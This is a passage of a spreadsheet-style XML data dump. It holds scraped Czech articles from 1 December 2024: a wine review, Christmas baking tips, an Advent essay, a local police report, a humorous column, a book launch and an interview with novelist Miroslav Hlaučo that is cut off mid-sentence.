    <t>Víno Rulandské modré 2022, moravské zemské víno , Vinařství Turoňovi Česká republika , oblast Morava , Znojemská podoblast, obec Božice, trať Stará hora 85 /100 1. 12. 2024 „Bledě rubínově červená barva s nazlátlým okrajem, cihlovými odlesky a výraznou viskozitou. Bohatá, čistá, středně intenzivní, nazrálá ovocná vůně, s velmi harmonickými tóny bobulového ovoce i peckovin, lehkým nádechem koření, připomínajícím skořici a hřebíček i velmi lehkou stopou ušlechtilého dřeva. Čistá, středně plná až plnější, oblá, šťavnatá a vyvážená chuť s elegantními tóny vyzrálého lesního ovoce, černých třešní, sladkého koření, hebkého sametového třísla i delikátními tóny dřeva, je doplněna o velmi příjemnou. kyselinku. Dlouhý ovocný závěr.“ (0) Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241201_238_3475059046_16fe0016b6c1738e4aab.html</t>
  </si>
  <si>
    <t>16fe0016b6c1738e4aab</t>
  </si>
  <si>
    <t>Jak mít dokonalé cukroví na Štědrý den: Plánujte chytře a skladujte správně</t>
  </si>
  <si>
    <t>Jak mít dokonalé cukroví na Štědrý den: Plánujte chytře a skladujte správně Pečení vánočního cukroví je jednou z nejkrásnějších svátečních tradic. Abyste si tento proces skutečně užili, je důležité mít plán a vědět, jak si pečení rozvrhnout. Připravili jsme pro vás praktické tipy, jak si práci usnadnit a také rady, jak cukroví skladovat, aby zůstalo čerstvé a chutné až do Štědrého dne. Martina Mádlová | 1. 12. 2024 Dobrá organizace ušetří spoustu času a práce. Proto jako první krok doporučujeme si sednout a vymyslet, jaké cukroví chcete péct a co k tomu budete potřebovat. Některé druhy cukroví, hlavně perníčky nebo vanilkové rohlíčky , potřebují více času na odležení, zatímco jiné, například nepečené cukroví , stačí připravit těsně před svátky. Vyplatí se začít s pečením již tři až čtyři týdny před Vánoci a rozvrhnout si jednotlivé kroky podle typu cukroví. Dokupte potřebné ingredience jako ořechy a máslo a nezapomeňte zkontrolovat pomůcky - pečicí papír, zdobicí sáčky nebo vykrajovátka . Jestli vám nějaká chybí nebo si chcete udělat radost, pořiďte si hezká vykrajovátka třeba na adventních trzích. Až to vše budete mít, můžete začít se zaděláváním těst a přípravami na pečení. Galerie: Uložte si cukroví bezpečně a zároveň stylově Přejít do galerie Čtěte také: Podstavec na cukroví si s naším návodem zvládnete vyrobit jednoduše sami a každého ohromí Už víte, jak letos budete servírovat cukroví? Máme pro vás tip! Vyrobte si etažér z dřevěných kulatin. Jednoduchý a stylový stojan nejen na cukroví dovede vaši vánoční výzdobu k dokonalosti, a navíc ušetříte místo na stole. Číst více Perníčky potřebují čas, nepečené cukroví zvládnete na poslední chvíli Zhruba tři až čtyři týdny před Vánoci se začínají péct perníčky, které potřebují nejdelší čas na změknutí a rozvinutí chuti. Ozdobit je můžete klidně později. Tradiční kousky jako zázvorky a další tvrdší druhy se pečou často ještě podle receptů našich babiček a při dostatečném odležení se jejich chuť výrazně zlepší. Asi dva týdny před Vánoci upečte linecké cukroví. Nechte vychladnout a zatím neslepené uložte na chladném místě. Slepujte až chvíli před Vánoci , aby bylo svěží a mělo správnou texturu. V dostatečném předstihu pečte i vanilkové rohlíčky a pracny. Týden před svátky nastává čas na rychlé a nepečené cukroví, kam patří vosí hnízda, různé kuličky, laskonky a sněhové pusinky. Postupně také naplňte cukroví krémy a marmeládou. Pokud ještě nemáte, vše ozdobte, protože cukroví plní i dekorativní funkci. Těsně před Štědrým dnem je čas na rolády či vánočky. Zdroj: Shutterstock Těsta si můžete připravit klidně dopředu, protože stejně většinou potřebují pár dnů na uležení. Před pečením vyndejte několik plechu, na které budete cukroví sázet. U pečení je důležité šetřit časem a plynule střídat jednotlivé kroky. Pro skladování cukroví je důležitá správná teplota a prostředí Různé druhy cukroví mají odlišné požadavky na skladování , aby zůstala zachovaná jejich textura a chuť. Máslové a slepované druhy (linecké cukroví) uložte do papírových nebo plechových nádob , které zajistí přiměřenou vlhkost a cukroví nebude vysychat, na chladném místě (komora, balkon). Křehké druhy jako kokosky a pusinky potřebují nádoby s průduchy , aby zůstaly suché a křupavé. Vystačíte si i s papírovou krabicí. Pozor na kontakt s vlhkem, změkly by vám a nebyly dobré. Nepečené cukroví uložte do uzavíratelných boxů a nechte v lednici. Cokoliv, co obsahuje smetanu nebo máslo, potřebuje nižší teplotu. Vzhledem k tomu, že je cukroví dost náchylné na pohlcování pachů , pozor na to, kde ho máte uložené. Vosí hnízda s vůní šunky vám asi příliš chutnat nebudou. Jednotlivé druhy v krabicích oddělte pečicím papírem nebo alobalem, aby nedocházelo k míchání chutí a vůní. Pokud vás zajímá optimální teplota skladování, tak u pečeného cukroví bez náplně je to 18 až 21 °C , u ostatních mnohem chladnější, ideálně kolem 10 °C . Doporučujeme využít vzduchotěsné nádoby , aby si zachovalo svou čerstvost. K perníčkům a jinému cukroví, které může vysychat, přiložte kousek jablíčka nebo pomeranče . Ty tomuto procesu brání a umožňují perníčkům změknout. Čtěte také: Kvíz: Jak dobře znáte tradiční i netradiční vánoční cukroví? Vánoce jsou za dveřmi a s nimi už brzy provoní domácnosti vůně čerstvě upečeného cukroví. Poznáte své oblíbené nejen podle chuti, vůně ale i podle obrázku? Vyzkoušejte náš kvíz a hned uvidíte, jak dobře se vyznáte v tradičních i méně známých vánočních dobrotách. Nemusíte mít obavy, malou nápovědu vám dáme. Číst více Zdroj článku vykrajovacky.cz, apetitonline.cz Marianne je i na sociálních sítích: vanocni cukrovi VÁNOCE 2024 vanocni peceni Související články Poradna Rozhovor s interiérovou designérkou: Při navrhování interiérů je mi inspirací celý svět Poradna Předvánoční úklid podle Marie Kondo : Zbavte se zbytečnosti a vneste do svého domova radost Poradna Testovali jsme kupovaná svařená vína : Které vás nadchne a jaké raději nekupovat? Poradna Padající rampouchy a sníh na chodníku: Kdo má povinnost je odstranit a koho mohou čekat nepříjemnosti za vzniklé škody Autor: Martina Mádlová Autor person Martina Mádlová</t>
  </si>
  <si>
    <t>148510</t>
  </si>
  <si>
    <t>20241201_239_3475082160_cafc185b8636b7d512dc.html</t>
  </si>
  <si>
    <t>cafc185b8636b7d512dc</t>
  </si>
  <si>
    <t>Denní výběr: Archeologové u Aše překvapili. Opevnění u Nebes nebylo místem velké bitvy</t>
  </si>
  <si>
    <t>20241201_24_3479104185_fe9c614f31c266ee0264.html</t>
  </si>
  <si>
    <t>fe9c614f31c266ee0264</t>
  </si>
  <si>
    <t>Dnes je první adventní neděle. Kde se vzala tradice zapalování svíček?</t>
  </si>
  <si>
    <t>Dnes je první adventní neděle. Kde se vzala tradice zapalování svíček? Foto: Depositphotos Advent, období plné klidu, očekávání a příprav na Vánoce, začíná čtyři týdny před Štědrým dnem. Slovo „advent“ pochází z latinského adventus, což znamená „příchod“. Toto období je tradičně spojováno s očekáváním narození Ježíše Krista a jeho příchodu na svět. Kromě duchovního rozměru je advent i časem rodinných tradic, zimních radostí a rozjímání nad uplynulým rokem. Dnes, v první adventní neděli, vstupujeme do významného času. Adventní věnec se čtyřmi svíčkami, symbolem naděje, víry, radosti a míru, je jedním z hlavních symbolů adventu. Na dnešní den připadá zapálení první svíčky, která symbolizuje naději. Tento rituál je pro mnohé rodiny chvílí, kdy se společně sejdou, ztiší a vzpomínají na pravý smysl Vánoc. Advent má své kořeny ve 4. století, kdy se začal slavit jako přípravné období před Vánocemi. Původně byl spojen s postem a modlitbami, podobně jako období před Velikonocemi. Lidé se připravovali na oslavu narození Krista duchovním očištěním a zaměřením na pomoc druhým. I dnes je advent v křesťanských tradicích časem zamyšlení, dobročinnosti a sdílení lásky s bližními. Moderní pojetí adventu přináší další zvyklosti, které tento čas obohacují. Jednou z oblíbených tradic je adventní kalendář, který dětem i dospělým pomáhá odpočítávat dny do Vánoc. Na trzích voní svařené víno , pečivo a cukroví, a mnozí lidé věnují víkendy pečení perníčků a přípravě na sváteční dny. První adventní neděle nám připomíná, že Vánoce jsou na dosah. Je to příležitost zpomalit, nadechnout se a strávit čas se svými blízkými. V dnešním uspěchaném světě může být advent chvílí, kdy se vrátíme k jednoduchým radostem života – společnému zpívání koled, večerům u svíček nebo laskavým gestům vůči těm, kteří potřebují naši pomoc. Adventní čas nás učí nejen očekávat něco krásného, ale také být vděční za to, co už máme. A právě dnes, kdy zapalujeme první svíčku na věnci, máme možnost na chvíli se zastavit a rozjímat o naději, kterou tento čas přináší. Autor: Libor Novák Autor person Libor Novák</t>
  </si>
  <si>
    <t>863</t>
  </si>
  <si>
    <t>11.09</t>
  </si>
  <si>
    <t>20241201_240_3475032838_21e01c67c6585f693f1a.html</t>
  </si>
  <si>
    <t>21e01c67c6585f693f1a</t>
  </si>
  <si>
    <t>Na noční směnu do firmy dorazila pracovnice v silně podroušeném stavu. Bez opory stále padala na zem</t>
  </si>
  <si>
    <t>Na noční směnu do firmy dorazila pracovnice v silně podroušeném stavu. Bez opory stále padala na zem Měla ji jako z praku, vlála jako vlajka ve větru. Přesně tak lze popsat stav, ve kterém přišla do zaměstnání pracovnice jedné společnosti sídlící v Plzni na Slovanech . Na silně podroušenou ženu upozornil hlídku městské policie svědek, který zavolal na tísňovou linku. „Před půlnocí byli naši strážníci přivoláni do jedné nejmenované společnosti. Na noční směnu tam totiž dorazila zaměstnankyně pod vlivem alkoholu a s výrazným alkoholovým odérem jako z palírny. Ženu vyprovodil ven jeden ze zaměstnanců, usadil ji na chodník a vyčkal na příjezd strážníků,“ popsala netradiční začátek pracovní směny jedné ženy mluvčí městské policie Tereza Schliková . Hlídka z ženy jen horko těžko dokázala dostat její totožnost. „Při dechové zkoušce nadýchala neuvěřitelných 3,61 promile. Pobyt na vzduchu jí zřejmě moc nepomohl, protože bez pomoci žena nebyla schopna samostatného pohybu. Nedokázala ani stát bez opory a neustále padala. Její noční směna nakonec skončila na protialkoholní záchytné stanici, kam byla převezena k vystřízlivění,“ dodala mluvčí městské policie. Autor: Richard Beneš Autor person Richard Beneš</t>
  </si>
  <si>
    <t>20241201_241_3475033681_7473fa3d5a4bc11e7179.html</t>
  </si>
  <si>
    <t>7473fa3d5a4bc11e7179</t>
  </si>
  <si>
    <t>FEJETON: O důležitosti zloprcků</t>
  </si>
  <si>
    <t>Shrnutí FEJETON: O důležitosti zloprcků 1. 12. 2024 Tonda je vztekloun. Nebo, chcete-li, cholerik. Má abnormálně krátkou zápalnou šňůru, k explodování a případnému pokusu o fyzickou agresi mu stačí doslova setina vteřiny. Naštěstí je to mrňous a vychrtlík, takže jeho výbuchy obvykle nemívají fatální následky. Třeba nedávno. Byli jsme u Tondy na návštěvě a Bohouš pronesl velmi neuctivou poznámku na adresu jeho milovaného ratlíka Samsona: „Teda, řeknu vám, já mít doma takovouhle psí myš, tak se bojím otevřít dveře, aby mi ji nevcucnul průvan.“ To si ale dovolil příliš a Tonda neprodleně odstartoval: „Tak tohle odvoláš, ty přerostlej šmejde, okamžitě se Samsíkovi omluv!“ Poskakoval kolem stodvacetikilového Bohouše s pěstičkami v boxerské poloze a uražený Samson ho podporoval hysterickým štěkáním ve velmi vysoké tónině. Scéna jako z pošahané italské komedie. Bohoušovi se pánbůzaplať povedlo mocným objetím připnout Tondovi paže k tělu a s chlácholivými slovy „klid, kamaráde, vždyť já si toho tvýho psíka vážím,“ ho něžně posadit na prádelník. Karel to lakonicky okomentoval: „Ještěže ten náš zloprcek Tonda má postavu vzrostlého pstruha, jinak bychom dneska odtud Bohouše odnášeli v igelitkách.“ Někdo by si možná v této chvíli pomyslel, proč vlastně takového vzteklého nerváka mezi sebou trpíme. Proč s ním kamarádíme, proč s ním jezdíme na ryby, proč s ním hrajeme mariáš, proč jsme rádi, když se zúčastňuje našich všemožných podniků? Odpověď sestává ze dvou částí. Zaprvé, kamarád Tonda je prima chlap. Je vtipnej a má skvělou fantazii k vymejšlení a organizování různých ptákovin a happeningů. Například jeho Hungáry vëkendóš se hluboce zapsal do našich vzpomínek. Spočíval v tom, že jsme se sjeli na jeho chalupě v Jizerkách a on na celou dobu pobytu vyhlásil přísný zákaz používání jakýchkoli jiných jazyků než ugrofinských, tedy maďarštiny, finštiny a estonštiny. Takže jsme se dorozumívali výhradně podivnou hatmatilkou a byla to náramná sranda. Součástí akce byl i soutěžní festival nazvaný Zákdákoš ökölöm, což v Tondově maďarštině znamenalo Pějme píseň dokola. Uskutečnil se u táborového ohně, kde každý musel za doprovodu Lubošovy kytary zazpívat ugrofinským jazykem některou ze známých českých trampských písní. Vyhrála Milada, která procítěně přednesla song Lkë ëkëlëléš tmë, neboli Lká ukulele tmou. Tonda jí pak slavnostně předal vítěznou trofej v podobě dvou nožiček čabajky a cedéčka s nahrávkou Uherské rapsodie č. 2 v cis-moll od Ference Liszta . No a druhým důvodem proč jsme rádi, že zloprcka Tondu v partě máme, je jeho užitečnost při komunikaci s vnějším společenským prostředím. Uvedu příklad: Nedávno jsem s ním seděl v jisté zahradní restauraci a oba jsme hluboce toužili po pivku, jež by konečně spláchlo vyprahlost horkého letního odpoledne. Mezi stoly ladně proplouvala servírka, která nás ovšem naprosto ostentativně přehlížela. Já se marně pokoušel upoutat její pozornost tlumeným přivoláváním a různými prosebnými gesty, pak ale v Tondovi klasicky bouchly saze. Vyskočil jako čert z krabičky až židle od jeho zadku metla kotrmelec a mohutně zařval: „Sakradoprčicpráce, milostivá krasavice inteligentní, to se tady musíme postavit na palici, abyste si nás konečně laskavě povšimla?“ Vypadal při tom trochu jako šílený prskající křeček, kterému právě vyloupili zásoby na zimu. Ale pomohlo to. Na žádné z pěti piv , které jsme tam tenkrát vypili, už jsme nemuseli čekat déle než dvacet vteřin. Ladná servírka nám je nosila sice se strachem v očích, leč rychle. Celá zahrádka si zřejmě myslela, že jsme hulváti a sprosťáci, ale to nám zase až tak nevadilo. Čili tím chci říct, že je velmi prospěšné mít v kolektivu jedince, s nímž se dá uskutečňovat stará dobrá a účinná komunikační metoda „hodnej policajt/zlej policajt“. Tonda je v tomhle fakt perfektní. Ve svém bleskurychlém vztekání je vlastně docela roztomilej, patří to ke koloritu naší party. S hysterickým ratličím křivonohem Samsonem tvořej dokonalý páreček zloprcků. Ostatně, všichni už se těšíme na další setkání na Tondově chalupě. Uskuteční se v dubnu a budou se slavit Samsonovy desáté narozeniny. Tonda předem vyhlásil ideový program – zasoutěžíme si v tom, kdo oslavenci více zalichotí, kdo oněm napíše lepší oslavnou báseň, kdo mu přiveze hodnotnější dary. Prostě zase bude náramná sranda. Autor: Tomáš Polák Autor person Tomáš Polák</t>
  </si>
  <si>
    <t>20241201_242_3475040254_5f36085159cd4237fa91.html</t>
  </si>
  <si>
    <t>5f36085159cd4237fa91</t>
  </si>
  <si>
    <t>Denní výběr: Veselé vařečky pobavily děti v Kladrubech. Tvořily je s fantazií a radostí</t>
  </si>
  <si>
    <t>20241201_243_3475021605_503c69448df842bddc70.html</t>
  </si>
  <si>
    <t>503c69448df842bddc70</t>
  </si>
  <si>
    <t>Zapomenuté příběhy významných osobností se vynořily ze zapomnění Od Peggy Kýrová - neděle, 1. prosinec 2024 06:31 Foto: archiv Zdeněk Levý Světla světa se dočkala ke konci letošního roku kniha, která přináší formou osobních vzpomínek často i zapomenuté příběhy velikánů své doby. Slavnostní křest knihy proběhl 21. listopadu za účasti autorů, podporovatelů projektu a hostů. Knihu vydal Syndikát západočeských novinářů. Publikace Neobyčejné životy se zaměřuje na osobnosti, které ve své době dosáhly mimořádných výsledků, či jedinečných převratných vynálezů, ale přesto jsou jejich jména málo známá. Jedná se například o inženýra Palíka, konstruktéra škodováckých elektrických lokomotiv, profesora Topolčana, který je předním odborníkem na poli tumorových markerů nebo také o Ivo Hlaváčka , který patří k legendám plzeňského pivovarnictví. Kniha nezapomíná ani na osobnosti z oblasti sportu, například hokejistu Bednáře, fotbalového brankáře Františka Čalouna , atleta Jiřího Henžlíka, nechybí ani osobnosti z oblasti výtvarného umění, například výtvarník a designér lisovaného skla František Pečený , za filmovou produkci je možné jmenovat kameramana Milana Kazdu . Zaujme i příběh slavné léčitelky a bylinkářky z Volduch Josefy Muhlbacherové a čtenář v knize najde mnohá další jména a příběhy. Tým 17 autorů dokázal shromáždit a zpracovat celkem 27 příběhů těchto nadaných lidí „ Tato kniha je určena pro všechny, kteří chtějí lépe poznat kořeny svého kraje. Doufáme, že se bude všem dobře číst, ale také že vzbudí další zájem a diskusi o regionální historii. Je to dílo, které má ambice propojit minulost se současností a ukázat, že i zdánlivě zapomenuté příběhy mají velký význam a slouží jako inspirace pro naši novou mladou generaci, " řekl Zdeněk Levý, předseda Syndikátu západočeských novinářů. Kromě knihy Neobyčejné životy vypustil Syndikát západočeských novinářů a vydavatelství Delex Plzeň do světa ještě knihu s názvem Pivní rebelie. Čtvrtá kniha Jaroslava Pompa nabízí zajímavé příběhy malých řemeslných pivovarů v Plzeňském kraji , které proměnily pití piva v objevitelskou napínavou cestu pestrobarevnou pivní planetou. Kniha má ambici být užitečným průvodcem pro vyznavače trendového gastroturismu, u každého pivovaru přiblíží i místní turistické cíle a zajímavosti, pomůže objevitelům orientovat se v pivních stylech, které obohatily klasický český ležák. Přináší také silné poselství pivovarníků, nezanedbatelné v dnešní nervózní konfrontační době: ač jsou konkurenty, dokážou se přátelit, spolupracovat, fandit si. Pivo lidi sbližuje, to je zásadní apel knihy Pivní rebelie, která přibližuje kreativní práci sládků. Fotogalerie Autor: Peggy Kýrová Autor person Peggy Kýrová Rubrika transition_slide Aktuálně</t>
  </si>
  <si>
    <t>1490</t>
  </si>
  <si>
    <t>731000</t>
  </si>
  <si>
    <t>20241201_244_3475023305_6a3cc2400bc36ceeaa81.html</t>
  </si>
  <si>
    <t>6a3cc2400bc36ceeaa81</t>
  </si>
  <si>
    <t>Mnoho kostlivců nám povylézalo ze skříní a&amp;nbsp;vylezlo z&amp;nbsp;hrobů, říká Miroslav Hlaučo, autor románu Letnice</t>
  </si>
  <si>
    <t>Mnoho kostlivců nám povylézalo ze skříní a&amp;nbsp;vylezlo z&amp;nbsp;hrobů, říká Miroslav Hlaučo, autor románu Letnice 1. prosince 2024 6:30 Knihy roku Literatura Rozhovory Mnoho kostlivců nám povylézalo ze skříní a vylezlo z hrobů, říká Miroslav Hlaučo, autor románu Letnice Michal Červený Denník N Autor knihy Letnice Miroslav Hlaučo. Foto: Marta Nováková. Spisovatel Hlaučo v rozhovoru vysvětluje, proč je podle něj současnost velmi podobná začátku 20. století, kdy si lidé mysleli, že dějiny skončily, a tak mohli kasárna předělat na sanatorium. „Dokázali byste si ještě před dvaceti lety představit, že v Evropě bude hned za rohem velká válka se statisíci obětí, ve které se budou bombardovat města plná civilistů včetně škol a nemocnic?“ ptá se. Tento text pro vás načetl robotický hlas. Pokud najdete chybu ve výslovnosti, dejte nám prosím vědět . Podcasty a audioverze článků můžete poslouchat v rámci klubového předplatného . Plné znění audioverzí článků je dostupné pouze pro předplatitele Klubu N. Upgradujte své předplatné. Plné znění audioverzí článků je dostupné pouze pro předplatitele Klubu N. Předplaťte si ho také. Miroslav Hlaučo sice vystudoval režii na DAMU a filmovou vědu na Filozofické fakultě Univerzity Karlovy v Praze , ale většinu dospělého života se živí farmacií, kterou vystudoval v Bratislavě . Pochází z liptovské vesnice Bobrovec, nicméně už tři desetiletí žije v Praze a svoji knižní prvotinu také napsal v češtině. Letos jako sedmapadesátiletý debutoval s kritiky oceňovaným románem Letnice . Příběh je situován na přelom 19. a 20. století, kdy se i do zapadlé vesničky Svatý Jiří začínají dostávat výdobytky nových časů. Místní nicméně nechtějí připustit, aby se stromy rovnou kácely, aniž si s nimi napřed promluví. Nechtějí používat dynamit, když na dolování kamene mají píšťalku. Ani rybářské pruty se jim nezamlouvají, vždyť ryby dokážou přemluvit, aby samy vyskákaly na břeh. Hlaučo je sice člověk pokroku, ale jako by chtěl naznačit, že existují věci, na které se nemá sahat. Navíc je nejednoznačný, prostřednictvím jedné postavy se pokroku vysmívá, skrze druhou ho obdivuje. Čtenář si může vybrat. Nebo zůstat nejistý. Tím, jak příběh plyne a jak přirozeně do něj dokáže dostat nadpřirozeno, Hlaučo připomíná Márqueze. Protože je ale děj zasazen na území končící rakousko-uherské monarchie, je nám bližší. Namísto moskytiér a cholery je kulisou malebná odlehlá vesnice s katolickým farářem, místní léčitelkou nebo židovským krčmářem. Letnice nejsou napínavé čtení, nečekejte návaly dopaminu z nečekaných zvratů či promyšlených „cliffhangerů“. Autor místo toho nabízí zážitek ze čtení samotného. Někdy se po přečteném odstavci zastavíte a přemýšlíte, jak to myslel – byl nyní proti pokroku, nebo se postavil na jeho stranu? Vysmál se věřícím, nebo je laskavě pohladil? Miroslav Hlaučo v rozhovoru vysvětluje, proč je podle něj současnost velmi podobná tomu, jak vypadal začátek 20. století, kdy si lidé mysleli, že dějiny skončily, a tak mohli kasárna předělat na sanatorium. Jako místní na začátku 20. století ve Svatém Jiřím nerozumějí, proč by měli těžit dřevo sekerou a ryby lovit udicí, jsme my nyní zmateni z toho, co nám přinesly technologie. Najednou má každý právo na vyjádření názoru, i ten, kdo čím dál složitějšímu světu vůbec nerozumí a potřebuje si jej zjednodušit. „Mnohé jevy jsou už laikům těžko vysvětlitelné, velmi často jsou těžko vysvětlitelné i odborníkům, kteří na danou oblast nejsou specializovaní. A ten, kdo tomu nerozumí, nerad přiznává, že na to nestačí. A tak si najde jednodušší vysvětlení, protože tomu se věří snadněji,“ říká Hlaučo. V rozhovoru se mimo jiné dozvíte: Jestli si Miroslav Hlaučo myslí, že má cenu se vymezovat vůči současné době a pokroku. Co myslí tím, když říká, že nám na některé technologie „nedorostla duše“. Jestli vedle sebe mohou být tradice a pokrok. Jestli člověk může být nestranným pozorovatelem toho, co se děje ve společnosti. Proč si nemyslí, že by umělá inteligence dokázala napsat román na vysoké úrovni. A proč jsme z našeho myšlení vytěsnili atributy života, jako je smrt, nejistota, nejasnost. Existovaly staré dobré časy, nějaká zlatá éra? Já jsem rád, že jsem tady a teď, i když se mi samozřejmě mnoho současných věcí nezamlouvá. Ale za sebe nemám „nečisté“ svědomí ve vztahu k současnosti a současníkům. Můj román není historický, je psaný z pozice současného člověka. Minulost používá jen jako „prostor“, ve kterém se odehrává a který mi jako autorovi dává možnost mít nadhled a jistý odstup. Myslím si, že nějaká zlatá éra obecně neexistovala. Dobro je vždy jen součást přítomnosti, můžeme jej činit, žít a znát jen v aktuální době a v aktuální podobě. Žijeme přece krásné časy, kdy se můžeme cítit dostatečně bezpečně a dostatečně blahobytně a kdy máme přístup k poznání a kráse. Pokud toto období přijmeme jako danost, budeme mít nejen klid v duši, ale bude nám dáno i rozpoznat, co je v něm pro člověka „dobré“ a čím pro něj a hlavně pro lidi, kteří v něm žijí, můžeme být „prospěšní“, kam by mohlo nebo mělo směřovat – to je na tom to krásné a optimistické. Taková byla každá „éra“. Jen v té naší to „bytí člověkem“ – alespoň prozatím – méně bolí, protože je v ní – alespoň prozatím – více svobody a větší respekt k individualitě. Čas je nám dán jen jeden – ten náš. Můžeme se v něm poučit nebo vymezit vůči těm jiným éram, ale je jen na nás najít zlatou éru v té své době. To je myslím i princip individuálního vnímání štěstí. Váš román Letnice je také o tom, jak lidé nechtěli – nebo se báli – přijmout pokrok na přelomu 19. a 20. století. Tvrdíte, že i nyní žijeme v době, kdy se mnoho věcí mění naprosto zásadně. Co konkrétně tím myslíte? Prožíváme mnoho změn, společenských, sociálních, ekonomických, politických, ale i změn v myšlení a nazírání na svět. A tyto změny se dějí velmi rychle. Chvíli jsme mohli mít pocit, že dějiny skončily, že už se bude současný stav jen „korigovat“ a vylepšovat. A v mnoha ohledech tomu tak i je. Otázkou ale zůstává, jestli jsme toho pokroku připraveni využít ve svůj prospěch. Jestli v něm dokážeme lidsky žít a zůstat sami sebou. Jsem na světě padesát sedm let, to není tak moc. A svět se od dob mého dětství změnil k nepoznání – tak, že jsme si to ještě před pár desetiletími ani nedokázali představit. Mění se i člověk a jeho myšlení, jen trochu pomaleji než technologie a ideje, které ho obklopují. Jsou tací, kteří to nestíhají a snaží se žít „po staru“ v novém světě, do kterého jako by nezapadali. Něco jim drhne v soukolí. Snaží se to – občas marně – dohnat, ignorovat, odehnat nebo se proti tomu bouřit. To není nic nového, tkalci v Anglii před dvěma sty lety rozbíjeli automatické tkalcovské stavy, když měli pocit, že jim berou práci. Ale moc jim to nepomohlo. Ani současníkům snaha vymezit se vůči dnešku nepomůže. Dnešek se dá zlepšit, to ano, ale vrátit se do včerejška už nejde. Když jsem byl malý, vrcholem techniky byla kapesní kalkulačka a černobílá televize se dvěma programy. Dnes dohlédneme na konec vesmíru. Dokážeme sledovat molekuly, dopravit do kosmu tisíce satelitů, komunikovat v reálném čase přes wifi, svézt se ve vlaku nebo v autě, které nikdo neřídí, najít se v cizím městě na mapě… Dokáže to ale i naše „duše“? Dorostla nám už na vymoženosti, které tento svět poskytuje? Mnozí používají a využívají – možná i zneužívají – technologie, kterým nejenže nerozumí, ale nedokážou ani pochopit jejich princip nebo dohlédnout jejich důsledky. Některým přesto věří a některým zas paradoxně ne. A totéž platí i pro společenské jevy a děje. Říkáte, že se bojíte, že na technologie nám nedorostla duše. Jak to myslíte? Jedna rovina souvisí i s evropskou civilizací. Myslím si, že pokrok a technické možnosti jdou ruku v ruce s vývojem společnosti. A v dnešním globalizovaném (nebo postglobalizovaném?) světě se bohužel do rukou společností, které nedozrály na humanitu, dostaly technologie, které jim nenáleží. Nejsou v souladu s vývojem jejich společnosti, protože si je vzali už jako hotové. Ale to je složitá otázka, kterou tady nebudu rozebírat. Duše mnohých nedorostla k tomu, aby byla schopna důvěřovat tomu, kdo je vzdělaný a kompetentní, aniž by do detailů sama porozuměla. A to je živná půda pro polopravdy, konspirace, dokonce vysloveně absurdní lži, které bývají přitažlivé, bohužel, často pro „většinovou“ společnost. Ta by si ráda odhlasovala, že věci jsou takové, jak jim rozumí většina, ne menšina kompetentních. Každý má právo na názor, ale názor není zárukou pravdy a nenahradí poznání. Možná nám chybí pokora ve vztahu k tomu, co nechápeme. Sociální sítě nechávají znít naše hlasy. Zpyšněli jsme a máme pocit, že je musíme šířit a že máme povinnost hodnotit i to, čemu nerozumíme. A mnozí z nás to dělají. Pak se nám svět zdá „nepochopitelný“, „ne náš“, nevyvíjející se podle toho, co předpokládáme a co považujeme za správné. Velmi neochotně si připouštíme skutečnost, že neporozumění je záležitostí nás samotných, ne těch věcí a dějů, které nedokážeme pochopit. Říkáte, že se opět – podobně jako před 120 lety, kdy se odehrává váš román – objevují věci, o kterých jsme si mysleli, že se už dít nebudou. O co jde? Předělali jsme kasárna na sanatorium, jak se to stalo v okresním městě nedaleko Svatého Jiří, když si mysleli, že v novém světě už války nebudou? Nebo naopak: vstupem do NATO jsme se poučili ze začátku 20. století a připravujeme se na špatná léta? To je myslím zřejmé. Dokázali byste si ještě před dvaceti lety představit, že v Evropě bude – hned za rohem – velká válka se statisíci obětí, v níž se budou bombardovat města plná civilistů včetně škol a nemocnic? Napadlo by vás, že ve 21. století někdo zpochybní kulatost země nebo význam a mechanismus fungování vakcín nebo že se bude křísit nacionalismus 19. století? Mnoho kostlivců nám povylézalo ze skříní a vylezlo z hrobů. Hlavní hrdina vašeho románu Odysseus Pastýř je odkazem na Ježíše Krista , který přinášel naději. Co vám přináší naději v současnosti? Napadl mě První list Korintským: „A tak nyní zůstává víra, naděje, láska, tyto tři; ale největší z nich je láska.“ A s tím bych souhlasil, protože to jsou tři sestry nebo tři podoby téhož jevu směřujícího ke smysluplné budoucnosti. Naději mi přináší víra v lidskost, v lidskou lásku, v to, že je v nás zakořeněná. A konkrétně i víra v lidský rozum, jelikož si myslím, že rozum není v protikladu s těmi třemi jmenovanými, dokonce není v protikladu ani s emocemi, naopak. Stále věřím v lidský pokrok a v to, že se tento pokrok posouvá směrem k dobru, k toleranci, k poznání a odhalování zázraků světa. V tom je pro mě naděje. Jistě, občas – a děje se to i dnes – dojde k nějakému podivnému regresu, kdy lidé jako by ztratili rozum, nebo se mu dokonce brání a uvěří falešným prorokům. To ale nikdy nemá dlouhého trvání, protože „Eppur si muove…“ (A přece se točí!). A v tom je pro mě nějaká historická naděje. A vracet lidem víru v rozum a víru v budoucnost, tedy dávat jim naději, že jejich příběhy a jejich životy mají smysl, že svět je poznatelný a pochopitelný a že se neděje bez nich, nebo dokonce proti nim, je jeden z úkolů umění a literatury. Proto píšu a proto jsem napsal i tuto knihu. Byl bych rád, kdyby měl čtenář radost z toho, že svět tady je a vždy byl pro něj. Stejně jako je tady pro něj i tato knížka, jejíž děj nakonec „dobře dopadne“. A co mi ještě dává naději? Naději mi dává každé setkání s krásou nebo s poznáním nebo s náhodou, které porozumím. Protože to znamená, že ve světě krása je, že mu můžeme porozumět, že má smysl. Foto: Marta Nováková Pokrok a tradice nejsou protipóly Z toho, jak píšete, není jasné, jestli jste fanouškem pokroku, nebo tradice. Na obojí se díváte s bázní, zároveň se jim přibližně ve stejné míře vysmíváte. Je to záměr – nevyhranit se? To ale není výsměch ani snaha „nevyhranit se“. Myslím si, že je to odraz lidskosti a její omylnosti i geniality současně. A v tu přirozeně omylnou, nedokonalou, a přesto geniální a jedinečnou lidskost naprosto „vyhraněně“ věřím. Vždy z něčeho vycházíme a někam směřujeme. Vycházíme z tradice a to, k čemu směřujeme, by se dalo nazvat pokrokem. Nejsou to protipóly, jen dva úseky na jedné cestě, na které se vždy nacházíme mezi nimi. Oba jsou živé, oba důležité a jeden nepopírá ten druhý. V jednom podcastu jste řekl, že vás samotného pobavila scéna, kdy se anděl nevejde do „kadibudky“, protože mu překážejí křídla. Nebál jste se takhle si utahovat z křesťanského symbolu? Vůbec ne. Vždyť to je přirozeně lidské a humor přece k člověku patří, nebo ne? Souhlasím, že patří, sám mám rád i tvrdší humor a také na ještě vážnější témata. Lidé se ale někdy berou vážně. Humor pro ty, co se berou příliš vážně, nebo 